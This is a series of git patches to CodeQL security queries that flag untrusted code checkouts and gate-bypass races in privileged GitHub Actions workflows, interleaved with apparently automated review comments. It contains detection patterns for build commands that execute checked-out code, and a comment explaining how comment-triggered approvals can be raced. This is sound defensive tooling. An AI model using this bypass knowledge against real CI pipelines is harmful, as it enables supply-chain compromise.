LabelControlCheck + check instanceof LabelCheck or - // actor or association gates apply to IssueOps only - (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + // actor or association gates are only bypassable for IssueOps + // since an attacker can wait for a privileged user to comment on an issue + // and then mutate the checked-out code. 
+ // however, when used for pull_request_target, the check is not bypassable since + // the actor checked is the author of the PR + ( + check instanceof AssociationCheck or + check instanceof ActorCheck or + check instanceof PermissionCheck + ) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", +select s, checkout, s, + "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b9a1e4c6301a..6448f1a05a85 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
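Review bot: In UntrustedCheckoutTOCTOUCritical.ql the conjunct `checkout.getAFollowingStep() instanceof PoisonableStep` is now redundant with `checkout.getAFollowingStep() = s` where `s` is a `PoisonableStep`, and `j.getAStep() = checkout` duplicates `j = checkout.getEnclosingJob()`; dropping the duplicates keeps the `where` clause readable. The comment `actor or association gates are only bypassable for IssueOps` sits above a disjunction that also includes `PermissionCheck`, so it should mention permission checks; the same comment and code appear in the UntrustedCheckoutTOCTOUHigh.ql hunk. The new `query predicate edges(Step a, Step b) { a.getAFollowingStep() = b }` materialises every step-to-following-step pair in the database rather than only paths from a flagged checkout, which may be costly on large workflow sets; restricting `a` to a `MutableRefCheckoutStep` or its followers would presumably be enough for the path display. The select messages also differ between the two queries (`on check $@` vs `on step $@`) for the same condition.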
@@ -16,21 +16,37 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from ControlCheck check, MutableRefCheckoutStep checkout +from MutableRefCheckoutStep checkout, ControlCheck check where - // the job can be triggered by an external user - inPrivilegedExternallyTriggerableJob(check) and - // the mutable checkout step is protected by an access check - check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and - // there are no evidences that the checked-out code can lead to arbitrary code execution + // the checkout occurs in a privileged context + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) + ) and + // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and + // the mutable checkout step is protected by an access check + check.dominates(checkout) and ( + // environment gates do not depend on the triggering event + check instanceof EnvironmentCheck + or // label gates do not depend on the triggering event - check instanceof LabelControlCheck + check instanceof LabelCheck or - // actor or Association gates apply to IssueOps only - (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + // actor or association gates are only bypassable for IssueOps + // since an attacker can wait for a privileged user to comment on an issue + // and then mutate the checked-out code. 
+ // however, when used for pull_request_target, the check is not bypassable since + // the actor checked is the author of the PR + ( + check instanceof AssociationCheck or + check instanceof ActorCheck or + check instanceof PermissionCheck + ) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", +select checkout, + "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 3a87b30be970..c1d72dd46648 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -26,12 +26,12 @@ where j.getAStep() = checkout and // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or inPrivilegedExternallyTriggerableJob(checkout) - ) -select s, checkout, s, "Potential unsafe checkout of untrusted code on a privileged workflow." + ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) +select s, checkout, s, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index cb2f1cdaf95f..468a1214c62d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql 
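Review bot: The new select message says `on step $@` while the `$@` placeholder is bound to `check`, a `ControlCheck` rather than a step, and the sibling Critical query changed in this same commit uses `on check $@`; `"Insufficient protection against execution of untrusted code on a privileged workflow on check $@."` keeps the two consistent. The comment `// there are no evidences that the checked-out gets executed` should read `// there is no evidence that the checked-out code gets executed`, and the comment preceding the alternation should mention `PermissionCheck`, which the code now includes. The query metadata and imports are above the hunk.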
@@ -24,12 +24,12 @@ where j.getAStep() = checkout and // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or inPrivilegedExternallyTriggerableJob(checkout) - ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." + ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) +select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4f1173bd9adc..d4f97a32ec6a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.9 +version: 0.1.10 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index e3a42b3265d8..01045ddde5e1 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
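Review bot: The hunk only moves the `not exists(ControlCheck check | check.dominates(checkout))` conjunct behind the privileged-context test and rewords the alert, yet `UntrustedCheckoutHigh.expected` in the same commit drops the `.github/workflows/test2.yml:13:9:16:6` result, so the behavioural change originates elsewhere in the commit (presumably in the `ControlCheck` classes, which are outside this view) and deserves a sentence in the commit message naming the check that now dominates that checkout. The `from` clause and the query metadata are above the hunk.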
@@ -1,2 +1,25 @@
-| .github/workflows/comment.yml:37:9:41:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} |
-| .github/workflows/label.yml:13:9:17:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') |
+edges
+| .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step |
+| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:30:9:34:6 | Uses Step |
+| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:34:9:37:6 | Run Step |
+| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:37:9:41:6 | Uses Step |
+| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:41:9:41:43 | Run Step |
+| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:34:9:37:6 | Run Step |
+| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step |
+| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step |
+| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step |
+| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:41:9:41:43 | Run Step |
+| .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step |
+| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step |
+| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step |
+| .github/workflows/deployment.yml:16:10:22:7 | Uses 
Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step |
+| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step |
+| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step |
+| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step |
+| .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step |
+| .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step |
+#select
+| .github/workflows/comment.yml:41:9:41:43 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} |
+| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI |
+| .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI |
+| .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. 
| .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 5f4ba7a7b98f..87289c178af7 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -312,15 +312,15 @@ edges
 | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step |
 | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step |
 #select
-| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. 
|
-| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
-| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. |
+| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. 
|
+| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. 
|
+| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
index 9015e85b3d03..3619941aa12e 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
@@ -1,21 +1,20 @@
-| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. 
|
-| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/test2.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. 
|
+| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. |
+| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. 
| +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 45d51a4d00996bec8af9cd8f2cd12891856afa59 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:29:53 +0200 Subject: [PATCH 371/707] Add more poisonable steps --- .../codeql/actions/security/PoisonableSteps.qll | 2 +- ql/lib/ext/config/poisonable_steps.yml | 15 +++++++++------ 2 files changed, 10 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 4165df17a4d8..c228965736da 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -29,7 +29,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture("(^|\\b|\\s+)" + regexp, group) + cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) ) } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index dc835e7dab21..f13a2a16d359 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -35,6 +35,9 @@ extensions: - ["npm i(nstall)?"] - ["npm run"] - ["npm ci"] + - ["pnpm i(nstall)?"] + - ["pnpm run"] + - ["pnpm ci"] - ["pre-commit"] - ["prettier"] - ["pip install -r"] 
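Review bot: The rewritten pattern in `LocalScriptExecutionRunStep` wraps the data-model regexp as `.*(^|\\b|\\s+|\\$\\(|`)` + regexp + `(\\b|\\s+|;|\\)|`|$).*` with no comment on why both ends carry `.*`; the reason is that `regexpCapture` demands a full-string match, and the wrappers interact with the data model in a non-obvious way — the leading `.*` is greedy, so on a line with two candidates such as `./configure && ./build.sh` the engine appears to settle on the rightmost one and `cmd` becomes `build.sh` only. A comment along the lines of `// regexpCapture is a full match: the .* wrappers absorb the rest of the line; the inner alternations require the command to start a token (or a $(...)/backtick substitution) and to end at a delimiter` would record the intent, and a test line with two invocations would pin which one is reported. Only the `exists` body is in the hunk; the `cmd` field and the rest of the class are outside it.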
@@ -54,10 +57,10 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/)(.*)(\\s+|;|$)", 3] - - ["(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] - - ["(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] - - ["(python)\\s+(.*)\\.py(\\s+|;|$)", 3] - - ["(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] - - ["(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + - ["(\\.\\/)(.*)", 3] + - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] + - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] + - ["(python)\\s+(.*)\\.py", 3] + - ["(ruby)\\s+(.*)\\.rb", 3] + - ["(go)\\s+(.*)\\.go", 3] From 4b01cd5be45dc8ebb161e7e55ec4e4ef7b8172c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:51:19 +0200 Subject: [PATCH 372/707] Support flow through fromJson --- ql/lib/codeql/actions/ast/internal/Ast.qll | 101 +++++++++++++++--- .../CWE-094/.github/workflows/test9.yml | 27 +++++ .../CWE-094/CodeInjectionCritical.expected | 17 +++ .../CWE-094/CodeInjectionMedium.expected | 13 +++ 4 files changed, 141 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9d2a5b382063..c6569367c10e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
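Review bot: Removing the `(\\s+|;|$)` terminators leaves `(.*)` as the final group of the `./` and `source|sh|bash|zsh|fish` rows, and because it is greedy the trailing alternation that `LocalScriptExecutionRunStep` now appends (`(\\b|\\s+|;|\\)|`|$).*`) is satisfied by `$` after `(.*)` has swallowed the rest of the line: for `echo $(./get-version.sh)` group 3 is `get-version.sh)`, and for `bash build.sh && make` it is `build.sh && make`, while the `node`/`python`/`ruby`/`go` rows are unaffected because their extension group forces backtracking. If the captured command is later used to resolve the script path, that trailing text defeats the lookup; a class that excludes the same delimiters the wrapper lists, e.g. `- ["(\\.\\/)([^\\s;)`]+)", 3]` and `- ["(source|sh|bash|zsh|fish)\\s+([^\\s;)`]+)", 3]`, bounds the capture without changing what matches. The `# TODO` about `dir/cmd` forms remains open — `sh scripts/build.sh` is matched but a bare `scripts/build.sh` is not. The `poisonableLocalScriptsDataModel` extension block begins above the hunk.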
@@ -1194,12 +1194,25 @@ string getASimpleReferenceExpression(string s, int offset) { .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) } +bindingset[s] +string getAJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\).*", _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\).*", 1) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { - SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) } + SimpleReferenceExpressionImpl() { + exists(getASimpleReferenceExpression(expression, _)) or + exists(getAJsonReferenceExpression(expression, _)) + } abstract string getFieldName(); @@ -1236,8 +1249,17 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; SecretsExpressionImpl() { - normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(secretsCtxRegex()) and + fieldName = expr.regexpCapture(secretsCtxRegex(), 1) + ) } override string getFieldName() { result = fieldName } 
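Review bot: `getAJsonReferenceExpression` requires the argument to follow `fromjson(` immediately and to be closed immediately by `)`, so a call written with inner whitespace, `fromJSON( needs.x.outputs.y )`, is presumably not recognised and the taint step through it is silently lost; if the expression grammar allows such spacing, `\\s*` around the argument, `"(?i)fromjson\\(\\s*([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\s*\\).*"`, closes the gap (the `(?i)fromjson\\((.*)\\).*` extractor used by the class constructors would need the same `\\s*`). The comment copied from `getASimpleReferenceExpression` says `regexpFind` is used to obtain all `${{...}}` matches, but this helper matches no braces and its trailing `.*` swallows the rest of the string, so at most one match per expression is produced and any member access after the call (`.version` in the new test) is folded into the same reference; a doc comment stating that, e.g. `/** Gets the argument of the first fromJSON(...) call in `s`; any trailing member access is ignored, so the whole decoded value is the 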